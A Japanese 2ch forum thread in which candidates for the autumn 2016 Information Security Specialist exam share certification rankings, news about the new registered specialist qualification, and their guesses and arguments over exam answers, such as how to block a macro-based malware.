1 :
名無し検定1級さん
2016/10/16(日) 21:12:07.53 ID:Vnrwbn7X
2 :
名無し検定1級さん
2016/10/16(日) 21:12:49.29 ID:Vnrwbn7X
3 :
名無し検定1級さん
2016/10/16(日) 21:14:41.48 ID:Vnrwbn7X
4 :
名無し検定1級さん
2016/10/16(日) 21:15:14.83 ID:Vnrwbn7X
5 :
名無し検定1級さん
2016/10/16(日) 21:16:18.46 ID:Vnrwbn7X
◆2013/09/23版
63:ITストラテジスト
62:システム監査技術者、Oracle Platinum、CCIE
61:プロジェクトマネージャ
60:ITサービスマネージャ、システムアーキテクト、OCJ-EA
58:スペシャリスト(ネットワーク、データベース)、RHCE
57:スペシャリスト(エンベデット、情報セキュリティ)MCSE、MCSD、LPIC Level3、OCSecA、OCJ-D、Oracle Gold
56:RHCT、PMP、CISA、CISSP
55:MCSA、CCNP、ITILマネージャ(V2)
54:XML Professional、MCITP
53:応用情報技術者、UML-advanced、VBAエキスパートプロフェッショナル、MCPD、UMTP-L3、
52:OCNA、OCJ-WC(J2EE1.4)、OCJ-BC(1.5)、公認情報セキュリティ監査人
51:LPIC Level2、OCJ-P Gold
50:基本情報技術者、OCJ-WC、OCJ-BC、OCJ-WS、OCJ-MA、P検1級、UML-intermediate
49:CCNA、OCJ-P Silver、.Com Master☆☆、UMTP-L2、MCTS、Security+、Project+、SEA/J応用テクニカル、SEA/J応用マネジメント、ITIL intermediate
48:Oracle Silver、P検準1級、OCSA、M日商PC(文書、データ)1級、CCENT
47:MCP、LPIC Level1、Linux+、Server+
46:MCA Master、Oracle Bronze、XML Basic、OCJ-A、UML-fundamental、Network+、J検PG認定、J検SE認定、SEA/J基礎
45:MCA、MTA、MOT、A+、UMTP-L1、VBAエキスパートスタンダード
44:P検2級、.Com Master☆、ITコーディネータ、ISMS審査員補、ITSMS審査員補
43:J検情報活用1級
42:ITパスポート、ITILファンデーション(V2)、ITIL V3 Foundation
41:VBAエキスパートベーシック、MOSマスター
40:J検情報活用2級、IC3、日商PC(文書、データ)2級
39:MOS Expert、MOS Specialist(Access)
38:MOS Specialist(Access以外)
6 :
名無し検定1級さん
2016/10/16(日) 21:16:42.53 ID:Vnrwbn7X
合否報告用テンプレ
【合否】
【午前T得点】
【午前U得点】
【午後T得点/自己採点】
【午後U得点/自己採点】
【午後選択問題】午後T問123、午後U12
【受験回数】 回
【学習期間】
【年齢】 歳
【保有資格】
【参考書】
【一言】
7 :
名無し検定1級さん
2016/10/16(日) 21:17:10.53 ID:Vnrwbn7X
セキュリティ法案が衆院可決、情報セキュリティ試験の新制度も実施へ
内閣官房から提出されていた「サイバーセキュリティ基本法及び情報処理の促進に関する法律の一部を改正する法律案」が2016年3月31日に衆議院を通過し、事実上施行されることが決まった。
これにより、同法案に盛り込まれた情報セキュリティ人材育成のための新試験制度が誕生することになる。
今回衆議院を通過した「サイバーセキュリティ基本法」の改正案は、政府機関のセキュリティ対策の強化のため、内閣官房のサイバーセキュリティ戦略本部が監査、調査、監視を行える範囲を拡大するというものだ。
法改正により、その範囲は独立行政法人や一部の特殊法人、認可法人にまで及び、その実務は情報処理推進機構(IPA)などが請負う。
一方、一緒に通過した「情報処理の促進に関する法律」では、基本法を受けてのIPAの業務追加、ソフトのぜい弱性情報等の公表方法・手続きの整備、そして情報処理安全確保支援士制度の創設という3点を整備することとなっている。
このうち情報処理安全確保支援士制度は、2020年に開催される東京オリンピック・パラリンピックをにらんで、情報セキュリティ対策の強化を人材面から図るための新制度だ。
情報処理技術者試験の一環として行われている「情報セキュリティスペシャリスト試験(SC試験)」に登録制と更新制を付加し、新試験として実施するもので、合格者の資格は、弁護士や公認会計士などと同じ「士業」に格上げされる。
政府案では、2020年までに登録者3万人を目標にしている。
これを達成するために、過去のSC試験合格者のスライドや類似資格を持っている場合の試験の一部免除など、幅広く登録者を募っていくこと、支援士のレベルを保つために更新のハードルをどの程度に設けるかなどを引き続き話し合っていくことになる。
新試験制度の実施は2017年を予定している。
8 :
名無し検定1級さん
2016/10/16(日) 21:17:42.00 ID:Vnrwbn7X
9 :
名無し検定1級さん
2016/10/16(日) 21:18:56.65 ID:Vnrwbn7X
IPA、平成28年度秋期情報処理技術者試験の応募者数を公表、情報セキュリティマネジメント試験は春期とほぼ同数
IPA(独立行政法人情報処理機構)は、10月16日に実施する「平成28年度秋期情報処理技術者試験」(以下、平成28年度秋期試験)の応募者数を公表した。
全体では昨年度秋期との比較で4%弱の増加(情報セキュリティマネジメント試験を除く)。今年度春期試験からスタートした「情報セキュリティマネジメント試験」は、春期とほぼ同数の2万2186人だった。
平成28年度秋期試験の応募者数は、前年同期比115.3%の22万0826人[1]。昨年度秋期には実施前だった情報セキュリティマネジメント試験を除くと、19万8640人(前年同期比103.7%)となった。
受験者数の増加には、情報セキュリティスペシャリスト試験の伸びが最も寄与した(前年同期比114.9%)。
政府がサイバーセキュリティ人材の育成を政策として掲げていることから、情報セキュリティに関する意識が高まり、応募者像として現れているのだろう。
今年度春期試験からスタートした「情報セキュリティマネジメント試験」も2万2186人と、2万2903人だった春期とほぼ同数となった(春期の96.9%)。
また、受験者数が多い非高度試験でも応募者が増えており、基本情報技術者試験は前年同期比102.6%、応用情報技術者試験でも前年同期比104.4%と伸ばした。
各試験区分の応募者数は次表のとおり。詳細はIPAの統計情報を参照のこと。
10 :
名無し検定1級さん
2016/10/16(日) 21:19:30.04 ID:Vnrwbn7X
11 :
名無し検定1級さん
2016/10/16(日) 22:50:47.26 ID:akYqwqFj
試験当日なのに盛り上がってないな
みんなどこ行った
12 :
(*´∀`)情弱士
2016/10/18(火) 10:49:02.31 ID:/zmUp4BN
ツイッターからのコピペ。
情報処理安全確保?援?は略して「情確士」のようですが、であれば、情報処理脆弱性対策支援士(ちと変か)は「情弱士」となるのかな(強引)
13 :
名無し検定1級さん
2016/10/18(火) 10:53:53.53 ID:ne1ZRaZC
アホスタマンは今回どうやった?
14 :
名無し検定1級さん
2016/10/18(火) 10:55:08.53 ID:Q+9h7uHJ
ネスペ落ちただろうけど次こっち受ける予定なんでみんなよろしく
15 :
名無し検定1級さん
2016/10/18(火) 11:43:59.28 ID:GEyyaQ1D
初回支援士試験まで、あと180日
最終セスペ公式解答公表まで、51日
最終セスペ合格発表まで、あと58日
16 :
名無し検定1級さん
2016/10/18(火) 12:28:19.18 ID:b88hOsNQ
登録情報セキュリティスペシャリスト
とセスペの違いってなんだ?
17 :
名無し検定1級さん
2016/10/18(火) 12:29:56.23 ID:11sjRR5G
>>12 通称は「登録情報セキュリティスペシャリスト」に決まったじゃん
18 :
名無し検定1級さん
2016/10/18(火) 12:32:59.49 ID:zBEKCIHL
19 :
名無し検定1級さん
2016/10/18(火) 12:35:23.35 ID:bBX05O5W
IPAに転職したい
20 :
名無し検定1級さん
2016/10/18(火) 12:39:54.68 ID:0el+1eIv
21 :
名無し検定1級さん
2016/10/18(火) 12:47:11.48 ID:bBX05O5W
22 :
名無し検定1級さん
2016/10/18(火) 13:00:45.11 ID:07OGjTSr
セスペで良いのでは
23 :
名無し検定1級さん
2016/10/18(火) 13:22:48.76 ID:GEyyaQ1D
>>21 RISS
Registered Information Security Supecialist
2ch的には、栗鼠(りす)
24 :
名無し検定1級さん
2016/10/18(火) 13:38:17.49 ID:qEfLorjw
25 :
名無し検定1級さん
2016/10/18(火) 14:35:11.86 ID:KqGMK2LA
RISSをわざわざ栗鼠って書かないし連想もしないから・・・
26 :
名無し検定1級さん
2016/10/18(火) 15:52:22.88 ID:1wzOn/kv
アホスタマンは午前通過したかな?
27 :
名無し検定1級さん
2016/10/18(火) 16:13:42.02 ID:AbSUKTgU
午前の問題の配点って、3点と4点?
2、3、4点とかあるの?
28 :
名無し検定1級さん
2016/10/18(火) 16:16:36.16 ID:wqTg7VT5
次受けるぞ!
初回合格率50%と見た!
29 :
名無し検定1級さん
2016/10/18(火) 16:43:01.89 ID:UQaQwfhO
情弱で申し訳ないが午後1門1で出てきたTCP Wrapperってipsecで暗号化されていると復号しないと内容が見れない?
30 :
名無し検定1級さん
2016/10/18(火) 17:04:55.22 ID:AwJ0erKR
>>29 IPsecはネットワーク層でTCPはその上のトランスポート層だから復号しないと見えないはず
31 :
名無し検定1級さん
2016/10/18(火) 17:07:49.88 ID:UQaQwfhO
>>30 ありがとうございます。試験時に何故かそこが気になって仕方なかったw
32 :
名無し検定1級さん
2016/10/18(火) 17:18:24.98 ID:/7p0fdsm
今回の試験の話ならP3の下2行から
「インターネットからIPSecを経由せずにLTEルータにSSHで接続できてしまう」問題を
S氏の指摘で「Tcp Wrapperで監視端末からのみに制限して暫定対策としましょう」
という話だから関連しないと思う
33 :
名無し検定1級さん
2016/10/18(火) 17:23:13.11 ID:P5VN1qTo
暫定対策はIDパスで認証しない方法について であって
TcpWrapperはその他の対策としてそういう手段がある って話じゃなかったっけ
34 :
名無し検定1級さん
2016/10/18(火) 17:32:34.39 ID:/7p0fdsm
ほんとだ。「暫定対策」という言葉は誤りでした。
要はIPSecとTCP Wrapperは混在してませんよ。って話です
35 :
名無し検定1級さん
2016/10/18(火) 18:44:44.62 ID:uu+kYduC
36 :
名無し検定1級さん
2016/10/18(火) 18:51:40.62 ID:gdWhbYPX
アイテックの回答速報みたけど午後Tで詰んだわ…
自分なりの配点予想で52点だった。。。
おまいらまた春に会おう!
37 :
名無し検定1級さん
2016/10/18(火) 18:52:38.92 ID:PhZ5tk4z
午後1たぶん通ったかな?
セスペ取れた気がする
38 :
名無し検定1級さん
2016/10/18(火) 19:04:14.51 ID:nu7tlc8p
配点予想はなしか
俺は自己採点60点だからしばらく悶絶だな
39 :
名無し検定1級さん
2016/10/18(火) 19:05:25.27 ID:YhwQHH+1
逆下駄さえなければ行けそうな気がしてきた
40 :
名無し検定1級さん
2016/10/18(火) 19:09:18.66 ID:0el+1eIv
午前2は92点で余裕だったが午後1の記述でとんちんかんな回答してるから無理そうだわで
半々ぐらいだから配点によるなぁ
41 :
名無し検定1級さん
2016/10/18(火) 19:11:56.95 ID:suB+iTBL
アイテック的にはマルウェアZは起動禁止にしない(できない)って結論なのか?
42 :
名無し検定1級さん
2016/10/18(火) 19:24:46.50 ID:XvDR8Sa6
俺の知ってるアンチウィルスソフトは、マルウェア名も登録するんだけどなあ
まぁ部分点に期待しようか
43 :
名無し検定1級さん
2016/10/18(火) 19:24:59.10 ID:5ETjsgzd
マルウェアZを禁止起動設定にするかしないかを判定させるには、問題文でマルウェアの中身か禁止起動設定の情報が少なくない?
実務の発想からしたら、まずは禁止起動設定に適用させる事を考えるでしょ。
44 :
名無し検定1級さん
2016/10/18(火) 19:26:29.96 ID:UkpVw+Oi
自己採点58点で撃沈
マルウェアZのとこウ、カなら大逆転だけど無理そうですね。。
45 :
名無し検定1級さん
2016/10/18(火) 19:30:23.74 ID:P5VN1qTo
つーかセキュリティ推進するはずのIPAが
あらかじめ拡大する可能性を見越して広域設定しておけよ ではなく
現状のみを判断して最低限の設定だけすれば良いよ っていうような
実社会や実働と反する問題を作り、そういう解答を推進するってどうかと思えるんだけど
こんなだからこの国のセキュリティ意識って伸びないんじゃねーのと思えるわ
46 :
名無し検定1級さん
2016/10/18(火) 19:35:34.32 ID:zbmNwBMg
とりあえずブロックさせるのが一般的じゃないの?
47 :
名無し検定1級さん
2016/10/18(火) 19:36:29.50 ID:pljd3bWV
ブロックと言うけど、どこにどういう内容設定するんだよ
マクロの名前って?
48 :
名無し検定1級さん
2016/10/18(火) 19:39:32.45 ID:0el+1eIv
ま、マクロ名
49 :
名無し検定1級さん
2016/10/18(火) 19:39:58.45 ID:P5VN1qTo
>>46 セキュリティにおいては疑わしきは絶っておけだよねえ
IPAが何を推進したいのか全くわからない
50 :
名無し検定1級さん
2016/10/18(火) 19:42:04.16 ID:pljd3bWV
51 :
名無し検定1級さん
2016/10/18(火) 19:43:10.37 ID:6EaOwzeQ
高度情報初めてなんだけど午後1って各問が50点?
あと採点って厳しめ?お情けはある?
といっても総得点から予想するしかないんだろうけど
52 :
名無し検定1級さん
2016/10/18(火) 19:46:11.47 ID:nu7tlc8p
ていうか結局ポリモーフィック型ウイルスなのかよ
こういうとこほんと紛らわしいよな
53 :
名無し検定1級さん
2016/10/18(火) 19:48:05.42 ID:iJzr4BSC
得点調整あるかな?
自己採点だと55点位なんだが
54 :
名無し検定1級さん
2016/10/18(火) 19:49:03.23 ID:UkpVw+Oi
問題見直したらマルウェアZのとこア、オの線もあるな
55 :
名無し検定1級さん
2016/10/18(火) 19:51:54.67 ID:uu+kYduC
IPA「ンゴ?最初に作っておいた模範解答と配点じゃ午後1の合格者40%ンゴww」
IPA「じゃあ正答率高い選択問題を5点から10点に、正答率低い記述問題を10点から5点にするニキーwww」
56 :
名無し検定1級さん
2016/10/18(火) 19:52:45.05 ID:EstO0ZNk
マルウェアZの問題についてはやっぱ議論になってるんだなあ
俺は文中の
"マルウェアZにはネットワークで接続された他のPCのサーバに感染を広げる機能がある"
から当然禁止設定するものと推測してしまった。
57 :
名無し検定1級さん
2016/10/18(火) 19:55:14.00 ID:pljd3bWV
マルウェアZ禁止したいやつらの気持ちはよくわかるけど、
具体的にどういう設定を入れるつもりなのよ
問題文の条件で可能な設定例を頼む
それが実現可能なら禁止にすべき
58 :
名無し検定1級さん
2016/10/18(火) 19:56:32.45 ID:Qjr9CjvL
問3はイ、オとカテゴリ単位以外はItecよりな回答だった
59 :
名無し検定1級さん
2016/10/18(火) 19:57:16.02 ID:2TATlOeG
だめだ…午前1
とんちんかんな回答してしまった…オワタンク
60 :
名無し検定1級さん
2016/10/18(火) 20:05:17.24 ID:cCdMk8pp
>>35 午後1設問3(4)
「ファームウェアをツールで解析して復号キーを得るんだ!(*^◯^*)」
ってお前、そのファームウェアが暗号化されてるって問題だろ
61 :
名無し検定1級さん
2016/10/18(火) 20:05:34.92 ID:Qjr9CjvL
午後1-1がどれくらい取れてるかだなあ
希望が出てきた
62 :
名無し検定1級さん
2016/10/18(火) 20:05:43.74 ID:2TATlOeG
問い3の選択問題全滅してた…
63 :
名無し検定1級さん
2016/10/18(火) 20:07:31.85 ID:Qjr9CjvL
>>60 俺もルータから探すのが解せなくて
制御コンピュータから探すとかワケワカメなこと書いたよww
64 :
名無し検定1級さん
2016/10/18(火) 20:13:23.31 ID:ZeNOU6lK
>>52 今回の感染PC内に既に別名等で複製潜伏してたら防げない
ということかと
65 :
名無し検定1級さん
2016/10/18(火) 20:13:58.58 ID:2TATlOeG
自己採点したら甘めで45点だったょ。
15点下駄履かせてくれないかな
66 :
名無し検定1級さん
2016/10/18(火) 20:15:25.93 ID:pljd3bWV
67 :
名無し検定1級さん
2016/10/18(火) 20:19:40.98 ID:P5VN1qTo
>>57 そもそも設問に具体的な環境や製品名がないので答えようがない
68 :
名無し検定1級さん
2016/10/18(火) 20:21:12.19 ID:Qjr9CjvL
ウ、カって書いたけど
今ならイ、オかなあ
69 :
名無し検定1級さん
2016/10/18(火) 20:22:20.78 ID:pljd3bWV
>>67 つまり示された環境での実現は無理なんじゃん?
70 :
名無し検定1級さん
2016/10/18(火) 20:23:05.30 ID:P5VN1qTo
>>69 可能とも不可能とも言えるんだよ
環境次第で、その環境が未定義なんだから
71 :
名無し検定1級さん
2016/10/18(火) 20:23:24.28 ID:suB+iTBL
>>60 ほんとこれ。
アイテックの回答みて、は?ってなったわ
72 :
名無し検定1級さん
2016/10/18(火) 20:24:08.85 ID:uu+kYduC
HTTPS(4文字)
73 :
名無し検定1級さん
2016/10/18(火) 20:24:28.26 ID:pljd3bWV
>>70 書いてないものは無いと考えるんじゃないの
勝手にプロキシ置いたりしないだろ?
74 :
名無し検定1級さん
2016/10/18(火) 20:25:20.38 ID:Qjr9CjvL
マクロってWord、Excel、一太郎あたり?
75 :
名無し検定1級さん
2016/10/18(火) 20:27:11.72 ID:P5VN1qTo
つーか
ア. 現状判明している被害のみ防げるよう設定すれば良い
イ. 未摘出等の被害拡大を予想し最悪のケースを想定して設定する
これで、IPAはアが正しいと言ってるんだぞ
場当たり的に随時対応するのが正しいって本当に言ってんのかよ設問作った奴は
76 :
名無し検定1級さん
2016/10/18(火) 20:32:23.40 ID:OUaAkN/N
>>75 やりたいかやりたくないか じゃなくて
出来るか出来ないかじゃないの?
77 :
名無し検定1級さん
2016/10/18(火) 20:34:09.39 ID:uu+kYduC
できるかできないかで言えば「環境次第」としかいいようがない
問題冊子裏に書いてある「問題に関する質問にはお答えできません。文意通り解釈してください。」の通り
こんなにふわふわしてるのセスペぐらいだよ
78 :
名無し検定1級さん
2016/10/18(火) 20:34:22.56 ID:Qjr9CjvL
現状判明している被害のみ
未摘出等の被害拡大を予想し
どっちもあいまいっちゃあいまいだな
ケースバイケースだと思うよ
79 :
名無し検定1級さん
2016/10/18(火) 20:35:04.81 ID:suB+iTBL
是が非でもそのマクロを動かしたくないというのなら
文書ソフト自体止めればいいから、できなくはない。
そこまでやるか、やらないかって話じゃないの?
80 :
名無し検定1級さん
2016/10/18(火) 20:35:36.35 ID:P5VN1qTo
>>78 設定します
あっ追加設定します
あっ追加設定します
あっ追加設定します...
これが、情報セキュリティスペシャリストのやることかって話だよ
81 :
名無し検定1級さん
2016/10/18(火) 20:36:28.95 ID:Qjr9CjvL
文書ソフトってひとつじゃないからね
片方だめならもう片方ってのもできなくはないか
82 :
名無し検定1級さん
2016/10/18(火) 20:38:56.08 ID:ZEmrT2TD
itecの速報ってどれくらい信用できるん?
スレ見てると早速誤答があるみたいだけど
83 :
名無し検定1級さん
2016/10/18(火) 20:39:12.99 ID:6EaOwzeQ
セキュリティ系の部署の人だと基本制限する、止める的な思考だけど
接続系扱ってる社内システムの人だと苦情貰いたくないから基本開けるみたいな思考だと思う
セキスペ的には前者であるべきだけど世の中にはそういう考えの人もいるってお話
84 :
名無し検定1級さん
2016/10/18(火) 20:40:17.33 ID:kGrT1KZO
>>60 自分もそう思って複合するときに攻撃者が複合鍵を盗聴して使用するとかいう小学生みたいな回答になったw
85 :
名無し検定1級さん
2016/10/18(火) 20:41:12.53 ID:ZeNOU6lK
>>79 マクロ機能だけ無効にすればいいから、プログラムの起動禁止をしなくても回避できる
だと思いました。
86 :
名無し検定1級さん
2016/10/18(火) 20:41:31.07 ID:Qjr9CjvL
いきなり全部停止したら
業務に支障きたすときがあるかもしれないじゃないか?
だから、ケースバイケースだと思う
業務に支障をきたさないとあれば、止めればいいし
正式回答がitecの回答とは限らんし、こればっかりは
87 :
名無し検定1級さん
2016/10/18(火) 20:41:31.74 ID:OUaAkN/N
じゃあどういう環境ならマルウェアZだけを禁止できるの?
88 :
名無し検定1級さん
2016/10/18(火) 20:42:42.86 ID:suB+iTBL
あれだわ。
サイドチャネル攻撃とか、タイミング攻撃とか眉唾な手法でカギを取得するんだろ。
89 :
名無し検定1級さん
2016/10/18(火) 20:43:41.12 ID:cCdMk8pp
設問は、J部長が何の「()のプログラム起動禁止設定を行う」よう指示したか。
「プログラム起動禁止設定」は文中で定義されてるし、その記載の機能がすべてだろ。
"PCのプログラム起動禁止設定には、プログラム名が一致した場合にプログラムの起動を禁止にする方式と、プログラムの実行ファイルのハッシュ値が一致した場合に禁止する方式があり、両方の方式を組み合わせた設定もできる"
この機能で文書ファイル内のマクロを禁止できると考えるかどうか。
文書ソフトを起動禁止にするのは「(マルウェアZ)のプログラム起動禁止設定を行う」とは言えない。
90 :
名無し検定1級さん
2016/10/18(火) 20:43:56.37 ID:lCU4/HR1
今更だけど
OSの管理用のコマンドをダウンロードするって言いかたが意味不明なのは俺だけ?
91 :
名無し検定1級さん
2016/10/18(火) 20:45:25.99 ID:Qjr9CjvL
>OSの管理用のコマンドをダウンロードするって言いかたが意味不明なのは俺だけ?
なんとなく拡張するのかなと思った
92 :
名無し検定1級さん
2016/10/18(火) 20:46:35.00 ID:SpbV46xY
おまいら事故採点の配点ってどうやってんのよ?
93 :
名無し検定1級さん
2016/10/18(火) 20:48:12.54 ID:P5VN1qTo
>>83 これ、前者の、情報セキュリティスペシャリストの試験だよ?
>>86 セキュリティインシデントが発生している以上、業務よりもセキュリティ最優先が当たり前
インシデント起こってるけど業務優先なんて、情報セキュリティスペシャリストがして良い判断ではないだろ
>>87 MSOfficeのマクロだとすればグループポリシー一発で無効化できるでしょ
社内なのにそういう環境ではないとしたら無理だけど。やっぱり環境が不明すぎるね。設問に不備がある
94 :
名無し検定1級さん
2016/10/18(火) 20:48:43.27 ID:ZeNOU6lK
>>89 問題が答えさせたいのは、
文書ファイルに埋め込まれた文書閲覧ソフト上で動くマクロだけを起動禁止プログラムとして登録 'できない'
ただそれだけなんだよね
95 :
名無し検定1級さん
2016/10/18(火) 20:50:25.27 ID:OUaAkN/N
>>93 それ禁止してるのはマルウェアZじゃないじゃん
問題よく読んで
96 :
名無し検定1級さん
2016/10/18(火) 20:51:15.29 ID:/I9bv0E+
マルウェアZには、ネットワークで接続された他のPCやサーバに感染を広げる機能がある。
って書いてあるじゃん。
感染しただけで終わりじゃないでしょ。
独自で起動するプログラムなのは間違いない。
97 :
名無し検定1級さん
2016/10/18(火) 20:52:09.64 ID:hymjaC55
俺もひっかかった側の人間だけどマクロと言われた時点でプログラム名、ハッシュ値では指定出来ないと言われたら確かにその通りなんだよなぁ…
あと広く制限するべきだ!とか言ってる人は論点ズレてるよな?
98 :
名無し検定1級さん
2016/10/18(火) 20:52:37.33 ID:P5VN1qTo
>>90 俺もそこ引っかかったけど、OSコマンドインジェクションが言いたいのかなと解釈した
99 :
名無し検定1級さん
2016/10/18(火) 20:53:37.98 ID:wWUZZaMN
>>65 H28春試験は自己採点50点台前半で、実際は72点
H27秋試験は40点台後半が、実際のところ64点でした
解答欄を全て埋めていたならば、午後1通過はあり得ると思っています
100 :
名無し検定1級さん
2016/10/18(火) 20:53:53.34 ID:P5VN1qTo
>>96 被害拡大させるようなタイプだとわかってるのに、現状被害に沿った設定だけ入れれば良いって、ますます矛盾してるだろw
101 :
名無し検定1級さん
2016/10/18(火) 20:54:19.67 ID:hymjaC55
>>60 ほんこれ
おかしいやろ
広く鍵を入手する方法(ソーシャルエンジニアリング等)を何か書けば正解にしてくれんか
102 :
名無し検定1級さん
2016/10/18(火) 20:57:55.00 ID:2uqahAQ/
答えがあれもこれも考えられるのはやめてほしい。時間もないし。
103 :
名無し検定1級さん
2016/10/18(火) 20:58:53.48 ID:Ie+rDIeS
>>60 PSPの解析とかで結局はこういう力技だからイメージついたわ
設問1選んでないけどw
104 :
名無し検定1級さん
2016/10/18(火) 20:59:56.91 ID:SpbV46xY
105 :
名無し検定1級さん
2016/10/18(火) 21:00:18.64 ID:/I9bv0E+
>>100 いや、俺はITECのイ、オに対して意義ありで
マルウェアZを含めたウ、カの立場。
106 :
名無し検定1級さん
2016/10/18(火) 21:00:20.37 ID:UkpVw+Oi
マルウェアZはC&Cサーバーと通信するので攻撃プログラムを禁止にしたところで
ほかのプログラムダウンロードさせられたら意味ないのでマルウェアZは禁止にすべき
って思ってたけどどうやって禁止にするかと問われれば僕には分からない。
107 :
名無し検定1級さん
2016/10/18(火) 21:01:42.06 ID:cCdMk8pp
>>96 >マルウェアZには、ネットワークで接続された他のPCやサーバに感染を広げる機能がある。
確かにそこは怪しい表現ではあるよね
アクセスできそうな共有フォルダにマルウェアZ含む文書ファイルをコピーしてばらまきまくる、
という機能がマクロ内で実現されていれば
「マルウェアZには感染を広げる機能がある」と言えなくもないかもしれないが
108 :
名無し検定1級さん
2016/10/18(火) 21:04:05.08 ID:qEfLorjw
マルウェアを含んだ文書ファイルのハッシュ値と一致するものは起動(ダブルクリック)禁止にしておけばいいんじゃね
109 :
名無し検定1級さん
2016/10/18(火) 21:04:07.62 ID:ZeNOU6lK
110 :
名無し検定1級さん
2016/10/18(火) 21:08:30.72 ID:kZzX6eFO
>>108 文書の方が違ったらハッシュ値は変わらない?
あと、大手のウイルス対策ソフトはマクロにも対応してるけど、その点はどうなってるんだろ?
111 :
名無し検定1級さん
2016/10/18(火) 21:09:53.50 ID:nu7tlc8p
スクリプトで脆弱性を突くプログラムって書いたけど点数もらえねーかなー
マクロウイルスはプログラムじゃないのか
112 :
(*´∀`)情弱士
2016/10/18(火) 21:10:27.63 ID:/zmUp4BN
113 :
名無し検定1級さん
2016/10/18(火) 21:10:54.72 ID:UkpVw+Oi
IPA様へ
イ、オもウ、カも正解にしてください。
114 :
名無し検定1級さん
2016/10/18(火) 21:12:01.46 ID:/I9bv0E+
>>109 独自で起動するプログラムととらえているので
プログラム名指定とハッシュ値を指定
115 :
名無し検定1級さん
2016/10/18(火) 21:12:54.44 ID:qEfLorjw
経験則からだけど午後1は比較的緩めの採点だから大丈夫でしょ
問題は午後2なんだよなぁ
容赦ない逆下駄してくるし
116 :
(*´∀`)情弱士
2016/10/18(火) 21:18:04.31 ID:/zmUp4BN
>>90 社員PCにないコマンドはダウンロードしないとな。
Ubuntuでは、apt-get install curl って打ったらダウンロードしてインストール完了。
117 :
名無し検定1級さん
2016/10/18(火) 21:18:50.75 ID:3b8cOAAi
iTec解答適当すぎないか?
問1-2-1-cとdは明らかに違うだろ
118 :
名無し検定1級さん
2016/10/18(火) 21:19:32.27 ID:kGrT1KZO
119 :
名無し検定1級さん
2016/10/18(火) 21:22:05.25 ID:suB+iTBL
120 :
名無し検定1級さん
2016/10/18(火) 21:24:35.43 ID:kIR2yas6
文書閲覧ソフトの脆弱性が解消されるまで文書閲覧ソフトを止めることに
なってもマルウェアZは禁止にすべきと思う
誰かが間違って添付ファイル開いたら従業員数1,000名のPCやサーバーに
どんどん感染が広がって収集つかなくなる
121 :
名無し検定1級さん
2016/10/18(火) 21:24:57.23 ID:XvDR8Sa6
問題自体は楽だったから、マクロ名のとこが正解なら問3全問正解になるんだよな
問一は微妙に色々なところで減点くらいそう
暫定対応の方にIP制限、本対応で鍵を採用する想定で回答しちゃったよ
グローバルIPでSSH開けてるとこで秘密鍵使わない会社の気持ちなんてわからねぇっすわ
122 :
名無し検定1級さん
2016/10/18(火) 21:26:46.25 ID:zbmNwBMg
>>92 45点くらいかなーとは思うが、何かしらで80点もありえる
123 :
名無し検定1級さん
2016/10/18(火) 21:28:05.11 ID:6EaOwzeQ
>>99 それって思ったより採点が甘かったとか部分点もらえたってこと?
124 :
名無し検定1級さん
2016/10/18(火) 21:28:30.19 ID:Qjr9CjvL
125 :
名無し検定1級さん
2016/10/18(火) 21:31:21.64 ID:zbmNwBMg
マルウェアZの止め方は置いといて、止めるか止めないかと聞かれたらどっちよ?
126 :
名無し検定1級さん
2016/10/18(火) 21:32:23.39 ID:Opdnxm/W
>>125 ユーザーPCは止める
管理者PCは不要?
127 :
名無し検定1級さん
2016/10/18(火) 21:33:20.06 ID:OUaAkN/N
128 :
名無し検定1級さん
2016/10/18(火) 21:34:17.81 ID:0el+1eIv
>>125 止めないと違う攻撃用プログラム落としてくる可能性があるやん
129 :
名無し検定1級さん
2016/10/18(火) 21:34:27.12 ID:3b8cOAAi
130 :
名無し検定1級さん
2016/10/18(火) 21:35:03.41 ID:3b8cOAAi
131 :
名無し検定1級さん
2016/10/18(火) 21:39:24.47 ID:hymjaC55
よく考えたらOSの管理用のコマンドもどうやって止めるんや?
あんまイメージわかないな
132 :
名無し検定1級さん
2016/10/18(火) 21:40:03.67 ID:7ixtexS3
問3の設問2 (1)はウ、カです。
133 :
(*´∀`)情弱士
2016/10/18(火) 21:42:41.29 ID:/zmUp4BN
>>131 マルウェアのなかには、マルウェア調査用コマンドを直ぐに停止させようとするモノもある。
人が思いつくような機能は、一通り持ってると思う。
134 :
名無し検定1級さん
2016/10/18(火) 21:44:06.44 ID:hymjaC55
c:(SSH[P22]で接続してきているG-IP)=x1.x2.x3.4
d:(SMTP[P25]で接続されてる宛先IP)=y1.y2.y3.y4
でしょ
135 :
名無し検定1級さん
2016/10/18(火) 21:44:24.26 ID:P5VN1qTo
>>131 Linuxならそのコマンドのファイルを別ファイルに置き換えるとか
136 :
名無し検定1級さん
2016/10/18(火) 21:45:04.72 ID:Opdnxm/W
問題は、同じフィルターで管理用PCとユーザーPCのウイルスを排除してることだよ。
フィルターが同じなら、管理用PCでマクロ対策をする必要はない…。
137 :
名無し検定1級さん
2016/10/18(火) 21:47:50.57 ID:KqGMK2LA
ところで問3-2-1で盛り上がってるところ悪いんだけど
問1-3-2
itec「組込み機器になりすます中間者攻撃」
オレ「同じホスト鍵を入手して不正ログインに利用」
これ部分点すら貰えない的外れな回答になってる?
138 :
(*´∀`)情弱士
2016/10/18(火) 21:48:08.49 ID:/zmUp4BN
139 :
名無し検定1級さん
2016/10/18(火) 21:49:25.50 ID:6EaOwzeQ
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](https://rz.anime-tube.win/pic.php?http://i.imgur.com/6nIEvOD.png)
午後1勝手な配点予想
保証はしないし10点レベルの上下はあると思う
140 :
名無し検定1級さん
2016/10/18(火) 21:49:38.02 ID:hymjaC55
>>133 >>135 マルウェアの話じゃなくて下の2つどちらかの方法で
OSコマンドをどう止めるのかっていう話なんだけど...
・プログラム名
・プログラムの実行ファイルのハッシュ値
今回の試験の話をしようぜ
141 :
名無し検定1級さん
2016/10/18(火) 21:50:50.66 ID:3huuoSmR
例年午後Tの下駄あるっぽいし、これで60点はギリギリもらえるよな!?
・問1
1:a.エ b.ア
2:(1)c.192.168.20.123 d.z1.z2.z3.z4
(2)ログインにパスワードではなく、ディジタル証明書を用いる
3:(1)e.監視端末の指定のポート番号以外からのアクセスを拒否する
(2)デフォルトのホスト鍵が使えるか各所で試す
(3)イメージファイルのハッシュ値にC社の秘密鍵でディジタル署名する
C社の公開鍵でディジタル署名が正当なものか検証する
